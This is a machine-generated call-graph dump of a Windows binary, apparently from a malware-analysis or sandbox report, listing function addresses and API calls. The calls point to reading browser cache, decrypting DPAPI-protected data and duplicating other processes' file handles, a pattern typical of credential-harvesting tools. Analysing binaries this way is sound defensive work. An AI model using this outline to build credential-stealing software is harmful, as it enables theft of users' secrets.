38753->38754 38755 413d2f FreeLibrary 38753->38755 38756 40b633 free 38754->38756 38755->38754 38757 413d42 38756->38757 38758 40b633 free 38757->38758 38759 413d4a 38758->38759 38759->38275 38760->38278 38761->38329 38762->38343 38764 44db70 38763->38764 38765 40b6fc memset 38764->38765 38766 409c70 2 API calls 38765->38766 38767 40b732 wcsrchr 38766->38767 38768 40b743 38767->38768 38769 40b746 memset 38767->38769 38768->38769 38770 40b2cc 27 API calls 38769->38770 38771 40b76f 38770->38771 38772 409d1f 6 API calls 38771->38772 38773 40b783 38772->38773 39821 409b98 GetFileAttributesW 38773->39821 38775 40b792 38776 40b7c2 38775->38776 38777 409c70 2 API calls 38775->38777 39822 40bb98 38776->39822 38779 40b7a5 38777->38779 38781 40b2cc 27 API calls 38779->38781 38784 40b7b2 38781->38784 38782 40b837 CloseHandle 38786 40b83e memset 38782->38786 38783 40b817 38785 409a45 3 API calls 38783->38785 38788 409d1f 6 API calls 38784->38788 38789 40b827 CopyFileW 38785->38789 39855 40a6e6 WideCharToMultiByte 38786->39855 38788->38776 38789->38786 38790 40b866 38791 444432 121 API calls 38790->38791 38792 40b879 38791->38792 38793 40bad5 38792->38793 38794 40b273 27 API calls 38792->38794 38795 40baeb 38793->38795 38796 40bade DeleteFileW 38793->38796 38797 40b89a 38794->38797 38798 40b04b ??3@YAXPAX 38795->38798 38796->38795 38799 438552 134 API calls 38797->38799 38800 40baf3 38798->38800 38801 40b8a4 38799->38801 38800->38353 38802 40bacd 38801->38802 38804 4251c4 137 API calls 38801->38804 38803 443d90 111 API calls 38802->38803 38803->38793 38827 40b8b8 38804->38827 38805 40bac6 39865 424f26 123 API calls 38805->39865 38806 40b8bd memset 39856 425413 17 API calls 38806->39856 38809 425413 17 API calls 38809->38827 38812 40a71b MultiByteToWideChar 38812->38827 38813 40a734 MultiByteToWideChar 38813->38827 38816 40b9b5 memcmp 38816->38827 38817 4099c6 2 API calls 38817->38827 38818 404423 38 API calls 38818->38827 38820 40bb3e memset memcpy 39866 40a734 MultiByteToWideChar 38820->39866 38821 4251c4 137 API calls 38821->38827 38824 40bb88 LocalFree 38824->38827 38827->38805 38827->38806 38827->38809 38827->38812 38827->38813 38827->38816 38827->38817 38827->38818 38827->38820 38827->38821 38828 40ba5f memcmp 38827->38828 39857 4253ef 16 API calls 38827->39857 39858 40b64c SystemTimeToFileTime FileTimeToLocalFileTime 38827->39858 39859 4253af 17 API calls 38827->39859 39860 4253cf 17 API calls 38827->39860 39861 447280 memset 38827->39861 39862 447960 memset memcpy memcpy memcpy 38827->39862 39863 40afe8 ??2@YAPAXI memcpy ??3@YAXPAX 38827->39863 39864 447920 memcpy memcpy memcpy 38827->39864 38828->38827 38829->38355 38831 40aed1 38830->38831 38832 40aec7 FindClose 38830->38832 38831->38287 38832->38831 38834 4099d7 38833->38834 38835 4099da memcpy 38833->38835 38834->38835 38835->38338 38837 40b2cc 27 API calls 38836->38837 38838 44543f 38837->38838 38839 409d1f 6 API calls 38838->38839 38840 44544f 38839->38840 39950 409b98 GetFileAttributesW 38840->39950 38842 44545e 38843 445476 38842->38843 38844 40b6ef 253 API calls 38842->38844 38845 40b2cc 27 API calls 38843->38845 38844->38843 38846 445482 38845->38846 38847 409d1f 6 API calls 38846->38847 38848 445492 38847->38848 39951 409b98 GetFileAttributesW 38848->39951 38850 4454a1 38851 4454b9 38850->38851 38852 40b6ef 253 API calls 38850->38852 38851->38369 38852->38851 38853->38368 38854->38385 38855->38391 38856->38428 38857->38410 38858->38455 38859->38455 38860->38438 38861->38466 38862->38468 38863->38470 38865 414c2e 17 API calls 38864->38865 38866 40c2ae 38865->38866 38936 40c1d3 38866->38936 38871 40c3be 38888 40a8ab 38871->38888 38872 40afcf 2 API calls 38873 40c2fd FindFirstUrlCacheEntryW 38872->38873 38874 40c3b6 38873->38874 38875 40c31e wcschr 38873->38875 38876 40b04b ??3@YAXPAX 38874->38876 38877 40c331 38875->38877 38878 40c35e FindNextUrlCacheEntryW 38875->38878 38876->38871 38880 40a8ab 9 API calls 38877->38880 38878->38875 38879 40c373 GetLastError 38878->38879 38881 40c3ad FindCloseUrlCache 38879->38881 38882 40c37e 38879->38882 38883 40c33e wcschr 38880->38883 38881->38874 38884 40afcf 2 API calls 38882->38884 38883->38878 38885 40c34f 38883->38885 38886 40c391 FindNextUrlCacheEntryW 38884->38886 38887 40a8ab 9 API calls 38885->38887 38886->38875 38886->38881 38887->38878 39125 40a97a 38888->39125 38891 40a8cc 38891->38477 38892 40a8d0 7 API calls 38892->38891 39130 40b1ab free free 38893->39130 38895 40c3dd 38896 40b2cc 27 API calls 38895->38896 38897 40c3e7 38896->38897 39131 414592 RegOpenKeyExW 38897->39131 38899 40c3f4 38900 40c50e 38899->38900 38901 40c3ff 38899->38901 38915 405337 38900->38915 38902 40a9ce 4 API calls 38901->38902 38903 40c418 memset 38902->38903 39132 40aa1d 38903->39132 38906 40c471 38908 40c47a _wcsupr 38906->38908 38907 40c505 RegCloseKey 38907->38900 38909 40a8d0 7 API calls 38908->38909 38910 40c498 38909->38910 38911 40a8d0 7 API calls 38910->38911 38912 40c4ac memset 38911->38912 38913 40aa1d 38912->38913 38914 40c4e4 RegEnumValueW 38913->38914 38914->38907 38914->38908 39134 405220 38915->39134 38919 4099c6 2 API calls 38918->38919 38920 40a714 _wcslwr 38919->38920 38921 40c634 38920->38921 39191 405361 38921->39191 38924 40c65c wcslen 39194 4053b6 39 API calls 38924->39194 38925 40c71d wcslen 38925->38491 38927 40c677 38928 40c713 38927->38928 39195 40538b 39 API calls 38927->39195 39197 4053df 39 API calls 38928->39197 38931 40c6a5 38931->38928 38932 40c6a9 memset 38931->38932 38933 40c6d3 38932->38933 39196 40c589 44 API calls 38933->39196 38935->38484 38937 40ae18 9 API calls 38936->38937 38943 40c210 38937->38943 38938 40ae51 9 API calls 38938->38943 38939 40c264 38940 40aebe FindClose 38939->38940 38942 40c26f 38940->38942 38941 40add4 2 API calls 38941->38943 38948 40e5ed memset memset 38942->38948 38943->38938 38943->38939 38943->38941 38944 40c231 _wcsicmp 38943->38944 38945 40c1d3 35 API calls 38943->38945 38944->38943 38946 40c248 38944->38946 38945->38943 38961 40c084 22 API calls 38946->38961 38949 414c2e 17 API calls 38948->38949 38950 40e63f 38949->38950 38951 409d1f 6 API calls 38950->38951 38952 40e658 38951->38952 38962 409b98 GetFileAttributesW 38952->38962 38954 40e667 38956 409d1f 6 API calls 38954->38956 38957 40e680 38954->38957 38956->38957 38963 409b98 GetFileAttributesW 38957->38963 38958 40e68f 38959 40c2d8 38958->38959 38964 40e4b2 38958->38964 38959->38871 38959->38872 38961->38943 38962->38954 38963->38958 38985 40e01e 38964->38985 38966 40e593 38967 40e5b0 38966->38967 38968 40e59c DeleteFileW 38966->38968 38969 40b04b ??3@YAXPAX 38967->38969 38968->38967 38971 40e5bb 38969->38971 38970 40e521 38970->38966 39008 40e175 38970->39008 38973 40e5c4 CloseHandle 38971->38973 38974 40e5cc 38971->38974 38973->38974 38976 40b633 free 38974->38976 38975 40e573 38977 40e584 38975->38977 38978 40e57c CloseHandle 38975->38978 38979 40e5db 38976->38979 39051 40b1ab free free 38977->39051 38978->38977 38982 40b633 free 38979->38982 38981 40e540 38981->38975 39028 40e2ab 38981->39028 38983 40e5e3 38982->38983 38983->38959 39052 406214 38985->39052 38988 40e16b 38988->38970 38991 40afcf 2 API calls 38992 40e08d OpenProcess 38991->38992 38993 40e0a4 GetCurrentProcess DuplicateHandle 38992->38993 38997 40e152 38992->38997 38994 40e0d0 GetFileSize 38993->38994 38995 40e14a CloseHandle 38993->38995 39088 409a45 GetTempPathW 38994->39088 38995->38997 38996 40e160 39000 40b04b ??3@YAXPAX 38996->39000 38997->38996 38999 406214 22 API calls 38997->38999 38999->38996 39000->38988 39001 40e0ea 39091 4096dc CreateFileW 39001->39091 39003 40e0f1 CreateFileMappingW 39004 40e140 CloseHandle CloseHandle 39003->39004 39005 40e10b MapViewOfFile 39003->39005 39004->38995 39006 40e13b CloseHandle 39005->39006 39007 40e11f WriteFile UnmapViewOfFile 39005->39007 39006->39004 39007->39006 39009 40e18c 39008->39009 39092 406b90 39009->39092 39012 40e1a7 memset 39018 40e1e8 39012->39018 39013 40e299 39102 4069a3 39013->39102 39019 40e283 39018->39019 39020 40dd50 _wcsicmp 39018->39020 39026 40e244 _snwprintf 39018->39026 39109 406e8f 13 API calls 39018->39109 39110 40742e 8 API calls 39018->39110 39111 40aae3 wcslen wcslen _memicmp 39018->39111 39112 406b53 SetFilePointerEx ReadFile 39018->39112 39021 40e291 39019->39021 39022 40e288 free 39019->39022 39020->39018 39023 40aa04 free 39021->39023 39022->39021 39023->39013 39027 40a8d0 7 API calls 39026->39027 39027->39018 39029 40e2c2 39028->39029 39030 406b90 11 API calls 39029->39030 39036 40e2d3 39030->39036 39031 40e4a0 39032 4069a3 2 API calls 39031->39032 39034 40e4ab 39032->39034 39034->38981 39036->39031 39037 40e489 39036->39037 39040 40dd50 _wcsicmp 39036->39040 39046 40e3e0 memcpy 39036->39046 39047 40e3fb memcpy 39036->39047 39048 40e3b3 wcschr 39036->39048 39049 40e416 memcpy 39036->39049 39050 40e431 memcpy 39036->39050 39113 406e8f 13 API calls 39036->39113 39114 40dd50 _wcsicmp 39036->39114 39123 40742e 8 API calls 39036->39123 39124 406b53 SetFilePointerEx ReadFile 39036->39124 39038 40aa04 free 39037->39038 39039 40e491 39038->39039 39039->39031 39041 40e497 free 39039->39041 39040->39036 39041->39031 39043 40e376 memset 39115 40aa29 39043->39115 39046->39036 39047->39036 39048->39036 39049->39036 39050->39036 39051->38966 39053 406294 CloseHandle 39052->39053 39054 406224 39053->39054 39055 4096c3 CreateFileW 39054->39055 39056 40622d 39055->39056 39057 406281 GetLastError 39056->39057 39058 40a2ef ReadFile 39056->39058 39062 40625a 39057->39062 39059 406244 39058->39059 39059->39057 39060 40624b 39059->39060 39061 406777 19 API calls 39060->39061 39060->39062 39061->39062 39062->38988 39063 40dd85 memset 39062->39063 39064 409bca GetModuleFileNameW 39063->39064 39065 40ddbe CreateFileW 39064->39065 39068 40ddf1 39065->39068 39066 40afcf ??2@YAPAXI ??3@YAXPAX 39066->39068 39067 41352f 9 API calls 39067->39068 39068->39066 39068->39067 39069 40de0b NtQuerySystemInformation 39068->39069 39070 40de3b CloseHandle GetCurrentProcessId 39068->39070 39069->39068 39071 40de54 39070->39071 39072 413d4c 46 API calls 39071->39072 39080 40de88 39072->39080 39073 40e00c 39074 413d29 free FreeLibrary 39073->39074 39075 40e014 39074->39075 39075->38988 39075->38991 39076 40dea9 _wcsicmp 39077 40dee7 OpenProcess 39076->39077 39078 40debd _wcsicmp 39076->39078 39077->39080 39078->39077 39079 40ded0 _wcsicmp 39078->39079 39079->39077 39079->39080 39080->39073 39080->39076 39081 40dfef CloseHandle 39080->39081 39082 40df23 GetCurrentProcess DuplicateHandle 39080->39082 39085 40df8f CloseHandle 39080->39085 39086 40df78 39080->39086 39081->39080 39082->39080 39083 40df4c memset 39082->39083 39084 41352f 9 API calls 39083->39084 39084->39080 39085->39086 39086->39081 39086->39085 39087 40dfae _wcsicmp 39086->39087 39087->39080 39087->39086 39089 409a74 GetTempFileNameW 39088->39089 39090 409a66 GetWindowsDirectoryW 39088->39090 39089->39001 39090->39089 39091->39003 39093 406bd5 39092->39093 39094 406bad 39092->39094 39096 406c0f 39093->39096 39097 4066bf free malloc memcpy free free 39093->39097 39094->39093 39095 406bba _wcsicmp 39094->39095 39095->39093 39095->39094 39096->39012 39096->39013 39098 406be5 39097->39098 39098->39096 39099 40afcf ??2@YAPAXI ??3@YAXPAX 39098->39099 39100 406bff 39099->39100 39101 4068bf SetFilePointerEx memcpy ReadFile ??2@YAPAXI ??3@YAXPAX 39100->39101 39101->39096 39103 4069c4 ??3@YAXPAX 39102->39103 39104 4069af 39103->39104 39105 40b633 free 39104->39105 39106 4069ba 39105->39106 39107 40b04b ??3@YAXPAX 39106->39107 39108 4069c2 39107->39108 39108->38981 39109->39018 39110->39018 39111->39018 39112->39018 39113->39036 39114->39043 39116 40aa33 39115->39116 39117 40aa63 39115->39117 39118 40aa44 39116->39118 39119 40aa38 wcslen 39116->39119 39117->39036 39120 40a9ce malloc memcpy free free 39118->39120 39119->39118 39121 40aa4d 39120->39121 39121->39117 39122 40aa51 memcpy 39121->39122 39122->39117 39123->39036 39124->39036 39126 40a980 39125->39126 39127 40a995 _wcsicmp 39126->39127 39128 40a99c wcscmp 39126->39128 39129 40a8bb 39126->39129 39127->39126 39128->39126 39129->38891 39129->38892 39130->38895 39131->38899 39133 40aa23 RegEnumValueW 39132->39133 39133->38906 39133->38907 39135 405335 39134->39135 39136 40522a 39134->39136 39135->38491 39137 40b2cc 27 API calls 39136->39137 39138 405234 39137->39138 39139 40a804 8 API calls 39138->39139 39140 40523a 39139->39140 39179 40b273 39140->39179 39142 405248 _mbscpy _mbscat GetProcAddress 39143 40b273 27 API calls 39142->39143 39144 405279 39143->39144 39182 405211 GetProcAddress 39144->39182 39146 405282 39147 40b273 27 API calls 39146->39147 39148 40528f 39147->39148 39183 405211 GetProcAddress 39148->39183 39150 405298 39151 40b273 27 API calls 39150->39151 39152 4052a5 39151->39152 39184 405211 GetProcAddress 39152->39184 39154 4052ae 39155 40b273 27 API calls 39154->39155 39156 4052bb 39155->39156 39185 405211 GetProcAddress 39156->39185 39158 4052c4 39159 40b273 27 API calls 39158->39159 39160 4052d1 39159->39160 39186 405211 GetProcAddress 39160->39186 39162 4052da 39163 40b273 27 API calls 39162->39163 39164 4052e7 39163->39164 39187 405211 GetProcAddress 39164->39187 39166 4052f0 39167 40b273 27 API calls 39166->39167 39168 4052fd 39167->39168 39188 405211 GetProcAddress 39168->39188 39170 405306 39171 40b273 27 API calls 39170->39171 39180 40b58d 27 API calls 39179->39180 39181 40b18c 39180->39181 39181->39142 39182->39146 39183->39150 39184->39154 39185->39158 39186->39162 39187->39166 39188->39170 39192 405220 39 API calls 39191->39192 39193 405369 39192->39193 39193->38924 39193->38925 39194->38927 39195->38931 39196->38928 39197->38925 39199 40440c FreeLibrary 39198->39199 39200 40436d 39199->39200 39201 40a804 8 API calls 39200->39201 39202 404377 39201->39202 39203 404383 39202->39203 39204 404405 39202->39204 39205 40b273 27 API calls 39203->39205 39204->38496 39204->38497 39204->38498 39206 40438d GetProcAddress 39205->39206 39207 40b273 27 API calls 39206->39207 39208 4043a7 GetProcAddress 39207->39208 39209 40b273 27 API calls 39208->39209 39210 4043ba GetProcAddress 39209->39210 39211 40b273 27 API calls 39210->39211 39212 4043ce GetProcAddress 39211->39212 39213 40b273 27 API calls 39212->39213 39214 4043e2 GetProcAddress 39213->39214 39215 4043f1 39214->39215 39216 4043f7 39215->39216 39217 40440c FreeLibrary 39215->39217 39216->39204 39217->39204 39219 404413 FreeLibrary 39218->39219 39220 40441e 39218->39220 39219->39220 39220->38513 39221->38507 39223 40447e 39222->39223 39224 40442e 39222->39224 39225 404485 CryptUnprotectData 39223->39225 39226 40449c 39223->39226 39227 40b2cc 27 API calls 39224->39227 39225->39226 39226->38507 39228 404438 39227->39228 39229 40a804 8 API calls 39228->39229 39230 40443e 39229->39230 39231 404445 39230->39231 39232 404467 39230->39232 39233 40b273 27 API calls 39231->39233 39232->39223 39235 404475 FreeLibrary 39232->39235 39234 40444f GetProcAddress 39233->39234 39234->39232 39236 404460 39234->39236 39235->39223 39236->39232 39238 4135f6 39237->39238 39239 4135eb FreeLibrary 39237->39239 39238->38516 39239->39238 39241 4449c4 39240->39241 39242 444a52 39240->39242 39243 40b2cc 27 API calls 39241->39243 39242->38533 39242->38534 39244 4449cb 39243->39244 39245 40a804 8 API calls 39244->39245 39246 4449d1 39245->39246 39247 40b273 27 API calls 39246->39247 39248 4449dc GetProcAddress 39247->39248 39249 40b273 27 API calls 39248->39249 39250 4449f3 GetProcAddress 39249->39250 39251 40b273 27 API calls 39250->39251 39252 444a04 GetProcAddress 39251->39252 39261->38544 39262->38544 39263->38544 39264->38544 39265->38535 39267 403a29 39266->39267 39281 403bed memset memset 39267->39281 39269 403ae7 39294 40b1ab free free 39269->39294 39271 403a3f memset 39274 403a2f 39271->39274 39272 403aef 39272->38552 39273 409d1f 6 API calls 39273->39274 39274->39269 39274->39271 39274->39273 39275 409b98 GetFileAttributesW 39274->39275 39276 40a8d0 7 API calls 39274->39276 39275->39274 39276->39274 39278 40a051 GetFileTime CloseHandle 39277->39278 39279 4039ca CompareFileTime 39277->39279 39278->39279 39279->38552 39280->38551 39282 414c2e 17 API calls 39281->39282 39283 403c38 39282->39283 39284 409719 2 API calls 39283->39284 39285 403c3f wcscat 39284->39285 39286 414c2e 17 API calls 39285->39286 39287 403c61 39286->39287 39288 409719 2 API calls 39287->39288 39289 403c68 wcscat 39288->39289 39295 403af5 39289->39295 39292 403af5 20 API calls 39293 403c95 39292->39293 39293->39274 39294->39272 39296 403b02 39295->39296 39297 40ae18 9 API calls 39296->39297 39305 403b37 39297->39305 39298 403bdb 39299 40aebe FindClose 39298->39299 39300 403be6 39299->39300 39300->39292 39301 40ae18 9 API calls 39301->39305 39302 40ae51 9 API calls 39302->39305 39303 40add4 wcscmp wcscmp 39303->39305 39304 40aebe FindClose 39304->39305 39305->39298 39305->39301 39305->39302 39305->39303 39305->39304 39306 40a8d0 7 API calls 39305->39306 39306->39305 39308 409d1f 6 API calls 39307->39308 39309 404190 39308->39309 39322 409b98 GetFileAttributesW 39309->39322 39311 40419c 39312 4041a7 6 API calls 39311->39312 39313 40435c 39311->39313 39315 40424f 39312->39315 39313->38578 39315->39313 39316 40425e memset 39315->39316 39318 409d1f 6 API calls 39315->39318 39319 40a8ab 9 API calls 39315->39319 39323 414842 39315->39323 39316->39315 39317 404296 wcscpy 39316->39317 39317->39315 39318->39315 39320 4042b6 memset memset _snwprintf wcscpy 39319->39320 39320->39315 39321->38576 39322->39311 39326 41443e 39323->39326 39325 414866 39325->39315 39327 41444b 39326->39327 39328 414451 39327->39328 39329 4144a3 GetPrivateProfileStringW 39327->39329 39330 414491 39328->39330 39331 414455 wcschr 39328->39331 39329->39325 39333 414495 WritePrivateProfileStringW 39330->39333 39331->39330 39332 414463 _snwprintf 39331->39332 39332->39333 39333->39325 39334->38582 39336 40b2cc 27 API calls 39335->39336 39337 409615 39336->39337 39338 409d1f 6 API calls 39337->39338 39339 409625 39338->39339 39364 409b98 GetFileAttributesW 39339->39364 39341 409634 39342 409648 39341->39342 39365 4091b8 memset 39341->39365 39344 40b2cc 27 API calls 39342->39344 39346 408801 39342->39346 39345 40965d 39344->39345 39347 409d1f 6 API calls 39345->39347 39346->38585 39346->38612 39348 40966d 39347->39348 39417 409b98 GetFileAttributesW 39348->39417 39350 40967c 39350->39346 39351 409681 39350->39351 39418 409529 72 API calls 39351->39418 39353 409690 39353->39346 39364->39341 39419 40a6e6 WideCharToMultiByte 39365->39419 39367 409202 39420 444432 39367->39420 39370 40b273 27 API calls 39371 409236 39370->39371 39466 438552 39371->39466 39397 40951d 39397->39342 39417->39350 39418->39353 39419->39367 39516 4438b5 39420->39516 39422 44444c 39423 409215 39422->39423 39530 415a6d 39422->39530 39423->39370 39423->39397 39425 4442e6 11 API calls 39427 44469e 39425->39427 39426 444486 39428 4444b9 memcpy 39426->39428 39465 4444a4 39426->39465 39427->39423 39430 443d90 111 API calls 39427->39430 39534 415258 39428->39534 39430->39423 39431 444524 39432 444541 39431->39432 39433 44452a 39431->39433 39537 444316 39432->39537 39434 416935 16 API calls 39433->39434 39434->39465 39465->39425 39655 438460 39466->39655 39517 4438d0 39516->39517 39527 4438c9 39516->39527 39604 415378 memcpy memcpy 39517->39604 39527->39422 39531 415a77 39530->39531 39532 415a8d 39531->39532 39533 415a7e memset 39531->39533 39532->39426 39533->39532 39535 4438b5 11 API calls 39534->39535 39536 41525d 39535->39536 39536->39431 39667 41703f 39655->39667 39657 43847a 39658 43848a 39657->39658 39659 43847e 39657->39659 39674 438270 39658->39674 39704 4446ea 11 API calls 39659->39704 39668 417044 39667->39668 39669 41705c 39667->39669 39671 416760 11 API calls 39668->39671 39673 417055 39668->39673 39670 417075 39669->39670 39672 41707a 11 API calls 39669->39672 39670->39657 39671->39673 39672->39668 39673->39657 39805 413f4f 39778->39805 39781 413f37 K32GetModuleFileNameExW 39782 413f4a 39781->39782 39782->38645 39784 413969 wcscpy 39783->39784 39785 41396c wcschr 39783->39785 39788 413a3a 39784->39788 39785->39784 39787 41398e 39785->39787 39810 4097f7 wcslen wcslen _memicmp 39787->39810 39788->38645 39790 41399a 39791 4139a4 memset 39790->39791 39792 4139e6 39790->39792 39811 409dd5 GetWindowsDirectoryW wcscpy 39791->39811 39794 413a31 wcscpy 39792->39794 39795 4139ec memset 39792->39795 39794->39788 39812 409dd5 GetWindowsDirectoryW wcscpy 39795->39812 39796 4139c9 wcscpy wcscat 39796->39788 39798 413a11 memcpy wcscat 39798->39788 39800 413cb0 GetModuleHandleW 39799->39800 39801 413cda 39799->39801 39800->39801 39802 413cbf GetProcAddress 39800->39802 39803 413ce3 GetProcessTimes 39801->39803 39804 413cf6 39801->39804 39802->39801 39803->38647 39804->38647 39806 413f2f 39805->39806 39807 413f54 39805->39807 39806->39781 39806->39782 39808 40a804 8 API calls 39807->39808 39809 413f5f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 39808->39809 39809->39806 39810->39790 39811->39796 39812->39798 39813->38667 39814->38691 39816 409cf9 GetVersionExW 39815->39816 39817 409d0a 39815->39817 39816->39817 39817->38697 39817->38702 39818->38703 39819->38707 39820->38709 39821->38775 39823 40bba5 39822->39823 39867 40cc26 39823->39867 39826 40bd4b 39888 40cc0c 39826->39888 39831 40b2cc 27 API calls 39832 40bbef 39831->39832 39895 40ccf0 _wcsicmp 39832->39895 39834 40bbf5 39834->39826 39896 40ccb4 6 API calls 39834->39896 39836 40bc26 39837 40cf04 17 API calls 39836->39837 39838 40bc2e 39837->39838 39839 40bd43 39838->39839 39841 40b2cc 27 API calls 39838->39841 39840 40cc0c 4 API calls 39839->39840 39840->39826 39842 40bc40 39841->39842 39897 40ccf0 _wcsicmp 39842->39897 39844 40bc46 39844->39839 39845 40bc61 memset memset WideCharToMultiByte 39844->39845 39898 40103c strlen 39845->39898 39847 40bcc0 39848 40b273 27 API calls 39847->39848 39849 40bcd0 memcmp 39848->39849 39849->39839 39850 40bce2 39849->39850 39851 404423 38 API calls 39850->39851 39852 40bd10 39851->39852 39852->39839 39853 40bd3a LocalFree 39852->39853 39854 40bd1f memcpy 39852->39854 39853->39839 39854->39853 39855->38790 39856->38827 39857->38827 39858->38827 39859->38827 39860->38827 39861->38827 39862->38827 39863->38827 39864->38827 39865->38802 39866->38824 39899 4096c3 CreateFileW 39867->39899 39869 40cc34 39870 40cc3d GetFileSize 39869->39870 39871 40bbca 39869->39871 39872 40afcf 2 API calls 39870->39872 39871->39826 39879 40cf04 39871->39879 39873 40cc64 39872->39873 39900 40a2ef ReadFile 39873->39900 39875 40cc71 39901 40ab4a MultiByteToWideChar 39875->39901 39877 40cc95 CloseHandle 39878 40b04b ??3@YAXPAX 39877->39878 39878->39871 39880 40b633 free 39879->39880 39881 40cf14 39880->39881 39907 40b1ab free free 39881->39907 39883 40cf1b 39885 40cfef 39883->39885 39887 40bbdd 39883->39887 39908 40cd4b 39883->39908 39886 40cd4b 14 API calls 39885->39886 39886->39887 39887->39826 39887->39831 39889 40b633 free 39888->39889 39890 40cc15 39889->39890 39891 40aa04 free 39890->39891 39892 40cc1d 39891->39892 39949 40b1ab free free 39892->39949 39894 40b7d4 memset CreateFileW 39894->38782 39894->38783 39895->39834 39896->39836 39897->39844 39898->39847 39899->39869 39900->39875 39902 40ab93 39901->39902 39903 40ab6b 39901->39903 39902->39877 39904 40a9ce 4 API calls 39903->39904 39905 40ab74 39904->39905 39906 40ab7c MultiByteToWideChar 39905->39906 39906->39902 39907->39883 39909 40cd7b 39908->39909 39910 40aa29 6 API calls 39909->39910 39914 40cd89 39910->39914 39911 40cef5 39912 40aa04 free 39911->39912 39913 40cefd 39912->39913 39913->39883 39914->39911 39915 40aa29 6 API calls 39914->39915 39916 40ce1d 39915->39916 39917 40aa29 6 API calls 39916->39917 39918 40ce3e 39917->39918 39919 40ce6a 39918->39919 39942 40abb7 wcslen memmove 39918->39942 39920 40ce9f 39919->39920 39945 40abb7 wcslen memmove 39919->39945 39923 40a8d0 7 API calls 39920->39923 39928 40ceb5 39923->39928 39924 40ce56 39943 40aa71 wcslen 39924->39943 39925 40ce8b 39946 40aa71 wcslen 39925->39946 39932 40a8d0 7 API calls 39928->39932 39929 40ce5e 39944 40abb7 wcslen memmove 39929->39944 39930 40ce93 39947 40abb7 wcslen memmove 39930->39947 39934 40cecb 39932->39934 39948 40d00b malloc memcpy free free 39934->39948 39936 40cedd 39937 40aa04 free 39936->39937 39938 40cee5 39937->39938 39939 40aa04 free 39938->39939 39940 40ceed 39939->39940 39941 40aa04 free 39940->39941 39941->39911 39942->39924 39943->39929 39944->39919 39945->39925 39946->39930 39947->39920 39948->39936 39949->39894 39950->38842 39951->38850 39952 427533 39956 427548 39952->39956 39965 425711 39952->39965 39953 4259da 40009 416760 11 API calls 39953->40009 39955 4275cb 39989 425506 39955->39989 39956->39955 39963 429b7a 39956->39963 39957 4260dd 40010 424251 120 API calls 39957->40010 39958 4259c2 39985 425ad6 39958->39985 40003 415c56 11 API calls 39958->40003 40015 4446ce 11 API calls 39963->40015 39965->39953 39965->39958 39968 429a4d 39965->39968 39971 422aeb memset memcpy memcpy 39965->39971 39975 4260a1 39965->39975 39981 429ac1 39965->39981 39988 425a38 39965->39988 39999 4227f0 memset memcpy 39965->39999 40000 422b84 15 API calls 39965->40000 40001 422b5d memset memcpy memcpy 39965->40001 40002 422640 13 API calls 39965->40002 40004 4241fc 11 API calls 39965->40004 40005 42413a 90 API calls 39965->40005 39969 429a66 39968->39969 39970 429a9b 39968->39970 40011 415c56 11 API calls 39969->40011 39974 429a96 39970->39974 40013 416760 11 API calls 39970->40013 39971->39965 40014 424251 120 API calls 39974->40014 40008 415c56 11 API calls 39975->40008 39977 429a7a 40012 416760 11 API calls 39977->40012 39981->39953 39981->39985 40016 415c56 11 API calls 39981->40016 39988->39958 40006 422640 13 API calls 39988->40006 40007 4226e0 12 API calls 39988->40007 39990 425554 39989->39990 39991 42554d 39989->39991 40018 422586 12 API calls 39990->40018 40017 423b34 103 API calls 39991->40017 39994 425567 39995 4255ba 39994->39995 39996 42556c memset 39994->39996 39995->39965 39997 425596 39996->39997 39997->39995 39998 4255a4 memset 39997->39998 39998->39995 39999->39965 40000->39965 40001->39965 40002->39965 40003->39953 40004->39965 40005->39965 40006->39988 40007->39988 40008->39953 40009->39957 40010->39985 40011->39977 40012->39974 40013->39974 40014->39981 40015->39981 40016->39953 40017->39990 40018->39994 40019 4147f3 40022 414561 40019->40022 40021 414813 40023 41456d 40022->40023 40024 41457f GetPrivateProfileIntW 40022->40024 40027 4143f1 memset _itow WritePrivateProfileStringW 40023->40027 40024->40021 40026 41457a 40026->40021 40027->40026 40028 44def7 40029 44df07 40028->40029 40030 44df00 ??3@YAXPAX 40028->40030 40031 44df17 40029->40031 40032 44df10 ??3@YAXPAX 40029->40032 40030->40029 40033 44df27 40031->40033 40034 44df20 ??3@YAXPAX 40031->40034 40032->40031 40035 44df37 40033->40035 40036 44df30 ??3@YAXPAX 40033->40036 40034->40033 40036->40035 40037 4148b6 FindResourceW 40038 4148cf SizeofResource 40037->40038 40041 4148f9 40037->40041 40039 4148e0 LoadResource 40038->40039 40038->40041 40040 4148ee LockResource 40039->40040 40039->40041 40040->40041 40042 441b3f 40052 43a9f6 40042->40052 40044 441b61 40225 4386af memset 40044->40225 40046 44189a 40047 442bd4 40046->40047 40048 4418e2 40046->40048 40049 4418ea 40047->40049 40227 441409 memset 40047->40227 40048->40049 40226 4414a9 12 API calls 40048->40226 40053 43aa20 40052->40053 40054 43aadf 40052->40054 40053->40054 40055 43aa34 memset 40053->40055 40054->40044 40056 43aa56 40055->40056 40057 43aa4d 40055->40057 40228 43a6e7 40056->40228 40283 42c02e memset 40057->40283 40062 43aad3 40284 4169a7 11 API calls 40062->40284 40065 43ac18 40067 43ac47 40065->40067 40286 42bbd5 memcpy memcpy memcpy memset memcpy 40065->40286 40068 43aca8 40067->40068 40287 438eed 16 API calls 40067->40287 40072 43acd5 40068->40072 40289 4233ae 11 API calls 40068->40289 40071 43ac87 40288 4233c5 16 API calls 40071->40288 40240 423426 40072->40240 40076 43ace1 40244 439811 40076->40244 40077 43a9f6 161 API calls 40078 43aae5 40077->40078 40078->40054 40078->40065 40078->40077 40285 439bbb 22 API calls 40078->40285 40080 43acfd 40085 43ad2c 40080->40085 40290 438eed 16 API calls 40080->40290 40082 43ad19 40291 4233c5 16 API calls 40082->40291 40084 43ad58 40292 44081d 163 API calls 40084->40292 40085->40084 40088 43add9 40085->40088 40087 423426 11 API calls 40089 43ae3a memset 40087->40089 40088->40087 40088->40088 40090 43ae73 40089->40090 40296 42e1c0 147 API calls 40090->40296 40091 43adab 40294 438c4e 163 API calls 40091->40294 40093 43ad6c 40093->40054 40093->40091 40293 42370b memset memcpy memset 40093->40293 40095 43ae96 40297 42e1c0 147 API calls 40095->40297 40097 43adcc 40295 440f84 12 API calls 40097->40295 40100 43aea8 40101 43aec1 40100->40101 40298 42e199 147 API calls 40100->40298 40103 43af00 40101->40103 40299 42e1c0 147 API calls 40101->40299 40103->40054 40106 43af1a 40103->40106 40107 43b3d9 40103->40107 40300 438eed 16 API calls 40106->40300 40113 43b3f6 40107->40113 40119 43b4c8 40107->40119 40108 43b60f 40108->40054 40273 4393a5 